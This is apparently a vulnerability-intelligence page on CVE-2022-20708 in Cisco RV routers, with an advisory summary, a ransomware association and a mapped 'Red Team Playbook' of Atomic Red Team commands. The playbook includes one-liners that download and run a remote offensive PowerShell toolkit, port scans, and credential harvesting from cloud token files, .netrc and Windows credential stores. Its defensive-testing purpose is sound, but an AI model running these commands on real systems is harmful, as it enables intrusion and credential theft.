CVE-2022-20708
Overview
This vulnerability set in Cisco Small Business RV Series Routers arises from multiple critical flaws including stack-based buffer overflows (CWE-121) and command injection vulnerabilities (CWE-78). These issues stem from improper input validation and inadequate boundary checks in the router firmware components responsible for command parsing and authentication mechanisms. Affected components include the firmware handling network management interfaces and software update processes across RV160, RV260, RV340, and RV345 models.
Vulnerability Description
Multiple vulnerabilities in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an attacker to do any of the following: Execute arbitrary code Elevate privileges Execute arbitrary commands Bypass authentication and authorization protections Fetch and run unsigned software Cause denial of service (DoS) For more information about these vulnerabilities, see the Details section of this advisory.
Impact
An unauthenticated attacker can remotely execute arbitrary code, escalate privileges, bypass authentication controls, and cause denial of service on affected Cisco RV Series routers. This enables full control over the device, including interception or manipulation of network traffic and deployment of malicious payloads. No user interaction or prior access is required, allowing attackers to compromise network security, disrupt business operations, and potentially pivot to internal networks.
Solution
Cisco has released firmware updates addressing these vulnerabilities for the Small Business RV Series Routers. Administrators should apply the patches detailed in Cisco Security Advisory cisco-sa-smb-mult-vuln-KA9PK6D immediately. The advisory provides specific firmware versions that remediate the issues and recommends verifying device firmware versions to ensure they include the fixes. No alternative workarounds are specified; updating to the fixed firmware is required to mitigate the risks.
EPSS vs KEV Prediction — Evolution (30 days)
Ransomware Intelligence
Predictions
Predictions are based on analysis of past ransomware group behaviors and their predilection for specific vulnerability characteristics, such as vendor, product, and flaw type.
The groups below are predictions based on historical exploitation patterns of the same vendor/product. These are not confirmations.
Full Analysis
The vulnerabilities present in Cisco's Small Business RV160, RV260, RV340, and RV345 Series Routers stem from multiple flaws in their firmware, which can be exploited to execute arbitrary code, elevate privileges, and bypass authentication mechanisms. These weaknesses arise from improper input validation and insufficient access controls, allowing unauthorized users to manipulate the router's functionalities. The ability to execute arbitrary commands poses a significant risk, as it can lead to unauthorized access to sensitive information or the installation of malicious software. Furthermore, the potential for denial of service (DoS) attacks can disrupt network operations, leading to significant downtime and loss of productivity.
Attack vectors for these vulnerabilities are varied, making them particularly concerning for organizations that rely on these routers for their network infrastructure. An attacker could exploit these weaknesses remotely, leveraging techniques such as sending crafted requests to the router's management interface or exploiting known default credentials. Once inside, an attacker could execute arbitrary commands, effectively taking control of the device. This could lead to further exploitation, such as fetching and running unsigned software, which could introduce additional malware into the network. The ability to elevate privileges means that even a low-level user could potentially gain administrative access, compounding the risk.
The real-world impact of these vulnerabilities can be severe, particularly for small to medium-sized businesses that may not have robust cybersecurity measures in place. A successful exploitation could lead to unauthorized access to sensitive data, including customer information and proprietary business processes. The financial implications of such breaches can be significant, encompassing costs related to incident response, potential regulatory fines, and damage to reputation. Additionally, the disruption caused by a DoS attack could lead to lost revenue and decreased customer trust, further exacerbating the business risk.
To detect and mitigate these vulnerabilities, organizations should implement a multi-layered security approach. Regular firmware updates are crucial, as they often contain patches that address known vulnerabilities. Organizations should also conduct routine security assessments and penetration testing to identify potential weaknesses in their network infrastructure. Employing network segmentation can limit the impact of an attack by isolating critical systems from less secure ones. Furthermore, implementing strong authentication mechanisms, such as multi-factor authentication, can significantly reduce the risk of unauthorized access.
In conclusion, the vulnerabilities affecting Cisco's Small Business RV Series Routers present a multifaceted threat landscape that requires immediate attention. The potential for arbitrary code execution, privilege escalation, and denial of service attacks poses significant risks to organizational security and operational integrity. By adopting proactive detection and mitigation strategies, businesses can better safeguard their networks against these vulnerabilities, ensuring a more resilient cybersecurity posture in an increasingly complex threat environment.
The CVSS score for CVE-2022-20708 has been revised upward to the maximum severity of 10.0, reflecting a reassessment of the vulnerability’s impact and exploitability. Despite this increase, the Exploit Prediction Scoring System (EPSS) score has declined moderately, indicating a slight reduction in the likelihood of widespread exploitation in the immediate term. Notably, CSURFACE threat intelligence has identified the ransomware group Akira as newly associated with this vulnerability, marking the first confirmed linkage to a financially motivated threat actor. This development elevates the operational risk, as ransomware campaigns leveraging such critical vulnerabilities can lead to rapid network compromise and significant disruption. While no new exploit techniques or proof-of-concept code have surfaced in our telemetry, the ransomware association underscores the need for heightened vigilance. Overall, the threat level has intensified due to the confirmed adversary interest and maximum severity rating, even as exploitation trends show a modest decline. Defenders should recognize that this vulnerability remains a high-priority concern given its critical severity and emerging ransomware ties.
Affected Products (4)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Cisco | Rv340 Firmware | All |
cpe:2.3:o:cisco:rv340_firmware:*:*:*:*:*:*:*:*
|
|
|
Cisco | Rv340w Firmware | All |
cpe:2.3:o:cisco:rv340w_firmware:*:*:*:*:*:*:*:*
|
|
|
Cisco | Rv345 Firmware | All |
cpe:2.3:o:cisco:rv345_firmware:*:*:*:*:*:*:*:*
|
|
|
Cisco | Rv345p Firmware | All |
cpe:2.3:o:cisco:rv345p_firmware:*:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
4 eventsSighting activity recorded
Sighting activity recorded
Ransomware group known to exploit this vulnerability. Tools: Advanced IP Scanner, Advanced Port Scanner, AnyDesk, Bloodhound, Cloudflared (1529 known victims)
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-88 | OS Command Injection |
55%
|
High | High | |
| CAPEC-6 | Argument Injection |
48%
|
High | High | |
| CAPEC-43 | Exploiting Multiple Input Interpretation Layers |
48%
|
Medium | High |
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (4)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2022-20708 |
| tools.cisco.com |
GitHub CVE
vendor-advisory
x_refsource_CISCO
|
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-smb-mult-vuln-KA9PK6D |
| zerodayinitiative.com |
GitHub CVE
x_refsource_MISC
|
https://www.zerodayinitiative.com/advisories/ZDI-22-417/ |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2022-20708 |